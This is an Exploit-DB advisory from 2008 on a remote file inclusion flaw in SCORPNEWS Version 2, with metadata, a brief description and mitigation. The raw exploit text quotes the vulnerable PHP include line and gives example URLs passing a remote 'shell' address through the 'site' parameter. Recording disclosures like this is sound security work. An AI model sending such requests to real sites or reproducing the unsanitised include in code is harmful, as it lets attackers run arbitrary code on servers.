Remote File Inclusion

vendor:

SCORPNEWS

by:

Silver

7.5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: SCORPNEWS

Affected Version From: SCORPNEWS Version 2

Affected Version To: SCORPNEWS Version 2

Patch Exists: NO

Related CWE: N/A

CPE: a:silver_crystal_war:scorpnews

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2008

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'site' parameter to '/news/example.php'. This can be exploited to execute arbitrary PHP code by including a remote file with a specially crafted URL.

Mitigation:

Input validation should be used to prevent the inclusion of remote files.

Source

Exploit-DB raw data:

########################################################################
#
# /news/example.php <= Remote File Inclusion
#
# Found By: Silver - x.56[@]hotmail[d0t]de
#
# Website: www.silver-crystal-war.6x.to
#
# Version: S C O R P N E W S Version 2
#
# Location: Germany
#
########################################################################
#
#file ;
#
#example.php
#
#<? include $site.'.php';?>
#
#########################################################################
#
#example Exploit ;
#
#http://www.example.com/example.php?site=http://shell
#
#http://www.example.com/news/example.php?site=http://shell
# 
########################################################################
#
#Greetz to;
#
# .:National Security Team:. (www.crystal-war.6x.to)
#
########################################################################

# milw0rm.com [2008-05-04]